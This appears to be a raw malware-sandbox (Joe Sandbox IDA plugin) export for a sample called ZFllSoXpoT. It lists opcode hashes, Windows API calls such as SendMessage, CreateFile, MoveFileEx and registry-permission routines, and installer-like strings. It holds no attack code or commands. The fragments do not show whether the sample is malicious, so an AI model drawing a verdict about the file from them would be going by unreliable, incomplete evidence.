                                                                            • Instruction ID: 8233eca9c26ae86130ab8a2651ceb45e7b9436c82c984da63702dcb6f06a18e2
                                                                            • Opcode Fuzzy Hash: 68b371c1f4cd94bc20bebdce253c565989975d555a3c9a3b5155311c67ca03d8
                                                                            • Instruction Fuzzy Hash: 27D0A7A0208300A6ED10F3F14C47E6F224C8D847587A4C43B7404E3182CABCE900993C
                                                                            APIs
                                                                            • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                                            • SaveDC.GDI32(?), ref: 00416C93
                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                                            • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                                            • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                            • String ID:
                                                                            • API String ID: 3808407030-0
                                                                            • Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                            • Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
                                                                            • Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                            • Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                            • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                                            • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                            • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                                            • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                                            • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                                            • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 52b5b48316c5d4ae37ce8577e0a97d76e0e4998a9a2ed84e03e9d155575d1481
                                                                            • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                                            • Opcode Fuzzy Hash: 52b5b48316c5d4ae37ce8577e0a97d76e0e4998a9a2ed84e03e9d155575d1481
                                                                            • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                            • 7427A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                                            • 74286310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                                            • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$742774286310A570DeleteObject
                                                                            • String ID:
                                                                            • API String ID: 3170013296-0
                                                                            • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                            • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                                            • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                            • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                                            APIs
                                                                              • Part of subcall function 0045D3B0: SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738D5
                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0047391C,?,?,0049C1D0,00000000), ref: 004738EB
                                                                            Strings
                                                                            • Setting permissions on registry key: %s\%s, xrefs: 0047389A
                                                                            • Failed to set permissions on registry key (%d)., xrefs: 004738FC
                                                                            • Could not set permissions on the registry key because it currently does not exist., xrefs: 004738DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                            • API String ID: 1452528299-4018462623
                                                                            • Opcode ID: 65c899866a6f92bdc558b75d1f6f5c8f40dffa86cd9e0ff42c768141b597e19f
                                                                            • Instruction ID: 0e56c8fb080e82cb73bff42131c1910bc7e2d1be1188aa0d4929b19add272574
                                                                            • Opcode Fuzzy Hash: 65c899866a6f92bdc558b75d1f6f5c8f40dffa86cd9e0ff42c768141b597e19f
                                                                            • Instruction Fuzzy Hash: D42186B0A046485FCB00DFA9C8816EEBBE5DF49315F50817BE508E7392D7B85A05CB6A
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                            • String ID:
                                                                            • API String ID: 262959230-0
                                                                            • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                            • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                            • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                            • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                            APIs
                                                                            • 74278830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                                            • 742722A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                                            • 74278830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                                            • 742722A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                                            • 7427A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: 74272274278830$7427A480
                                                                            • String ID:
                                                                            • API String ID: 163780596-0
                                                                            • Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                            • Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
                                                                            • Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                            • Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
                                                                            APIs
                                                                            • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                                            • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                                            • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Enum$NameOpenResourceUniversal
                                                                            • String ID: Z
                                                                            • API String ID: 3604996873-1505515367
                                                                            • Opcode ID: eb416ea4a1b8f2daa77fdd812f136362b1db0fd9b9a9c64830d5574e342882dc
                                                                            • Instruction ID: 2ace50d644c075eff23e32fa5e1ddfe03b8fa53596be5d4ceb5675c655e146ae
                                                                            • Opcode Fuzzy Hash: eb416ea4a1b8f2daa77fdd812f136362b1db0fd9b9a9c64830d5574e342882dc
                                                                            • Instruction Fuzzy Hash: C0513070E04218ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE418F5A
                                                                            APIs
                                                                            • SetRectEmpty.USER32(?), ref: 0044D05E
                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D089
                                                                            • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D111
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: DrawText$EmptyRect
                                                                            • String ID:
                                                                            • API String ID: 182455014-2867612384
                                                                            • Opcode ID: 9bd908fd6ab002ebc51c141ad104fc93549b6590cb61d9638f2d60c2e4f6398c
                                                                            • Instruction ID: 2c2bbb7fbf4b59eae95d31c7b28000ca71a9f0321ec4255fb332cd8a4a3f7a8e
                                                                            • Opcode Fuzzy Hash: 9bd908fd6ab002ebc51c141ad104fc93549b6590cb61d9638f2d60c2e4f6398c
                                                                            • Instruction Fuzzy Hash: F6516071E00244AFDB10DFA5C885BDEBBF8AF49308F08847AE845EB255D778A945CB64
                                                                            APIs
                                                                            • 7427A570.USER32(00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EFAE
                                                                              • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                            • SelectObject.GDI32(?,00000000), ref: 0042EFD1
                                                                            • 7427A480.USER32(00000000,?,0042F0BD,00000000,0042F0B6,?,00000000,00000000,0042F0D8,?,?,?,?,00000000,00000000,00000000), ref: 0042F0B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: 7427$A480A570CreateFontIndirectObjectSelect
                                                                            • String ID: ...\
                                                                            • API String ID: 2074263247-983595016
                                                                            • Opcode ID: da53642769cbe036028c7dc5c32fe254f1027efce08608ae13d670d4fc685408
                                                                            • Instruction ID: 4ea51e63949933808241df29427b07dd96e06abf1a704ffa26f869fa6ec4a11f
                                                                            • Opcode Fuzzy Hash: da53642769cbe036028c7dc5c32fe254f1027efce08608ae13d670d4fc685408
                                                                            • Instruction Fuzzy Hash: 2F315270B00128ABDF11EF96D841BAEB7B8EB48708FD1447BF410A7292D7785D49CA59
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateFileHandle
                                                                            • String ID: .tmp$_iu
                                                                            • API String ID: 3498533004-10593223
                                                                            • Opcode ID: dc109c8f01286b2989461901934a6d9e01325b966eab87418c3e389b569fc91a
                                                                            • Instruction ID: 4fa05f029f2566c48aedd37e5d2d112a05e3774389c58111587f2dbaaee79b9c
                                                                            • Opcode Fuzzy Hash: dc109c8f01286b2989461901934a6d9e01325b966eab87418c3e389b569fc91a
                                                                            • Instruction Fuzzy Hash: 9531A6B0A40149ABCF01EF95C982B9EBBB5AF44345F50452AF800B72C2D6785F058AAD
                                                                            APIs
                                                                            • GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                            • UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                            • RegisterClassA.USER32(?), ref: 004164DE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Class$InfoRegisterUnregister
                                                                            • String ID: @
                                                                            • API String ID: 3749476976-2766056989
                                                                            • Opcode ID: 8cb808bfaf21f9b6be1f4599df9655a946cb93d0bbb2725194c7e4a3bd3b9422
                                                                            • Instruction ID: 7ea39428e622c43f80c69b44bdb33f9ce6dea52ad5211df5dc1c1138561595a4
                                                                            • Opcode Fuzzy Hash: 8cb808bfaf21f9b6be1f4599df9655a946cb93d0bbb2725194c7e4a3bd3b9422
                                                                            • Instruction Fuzzy Hash: 0E318E706042009BD760EF68C981B9B77E5AB88308F04457FF985DB392DB39D9848B6A
                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C50
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498530,00000000,00497CD6,?,?,00000000,0049B628), ref: 00497C79
                                                                            • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00497C92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: File$Attributes$Move
                                                                            • String ID: isRS-%.3u.tmp
                                                                            • API String ID: 3839737484-3657609586
                                                                            • Opcode ID: 9f18e9119b438212db1bb595c56ccc89a7930ded87602de0aca2db56358788ed
                                                                            • Instruction ID: 213244b736f3eff521ec2db090c728ece63042f248bf50699bdf4cb02408e53f
                                                                            • Opcode Fuzzy Hash: 9f18e9119b438212db1bb595c56ccc89a7930ded87602de0aca2db56358788ed
                                                                            • Instruction Fuzzy Hash: 53214171E14219AFCF05EFA9C881AAFBBB8AB44714F50453BB814B72D1D6385E018B69
                                                                            APIs
                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                            • ExitProcess.KERNEL32 ref: 00404E0D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ExitMessageProcess
                                                                            • String ID: Error$Runtime error at 00000000
                                                                            • API String ID: 1220098344-2970929446
                                                                            • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                            • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                            • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                            • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                            APIs
                                                                              • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A88
                                                                            • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456AB5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                            • String ID: LoadTypeLib$RegisterTypeLib
                                                                            • API String ID: 1312246647-2435364021
                                                                            • Opcode ID: 384f0062f956a7e6e5f729262f076ec348bfef461e3db0757be0fdeeca084a77
                                                                            • Instruction ID: 5567ca09ff2ddd9e87874ef4cfa4ab968baaa8f1c3db1669d027a8a21fc87fa6
                                                                            • Opcode Fuzzy Hash: 384f0062f956a7e6e5f729262f076ec348bfef461e3db0757be0fdeeca084a77
                                                                            • Instruction Fuzzy Hash: 20119331B00604AFDB11EFA6CD55A5EB7BDEB8A705B51C4B6BC04E3652DA389E04CB24
                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456FA6
                                                                            • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 00457043
                                                                            Strings
                                                                            • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FD2
                                                                            • Failed to create DebugClientWnd, xrefs: 0045700C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
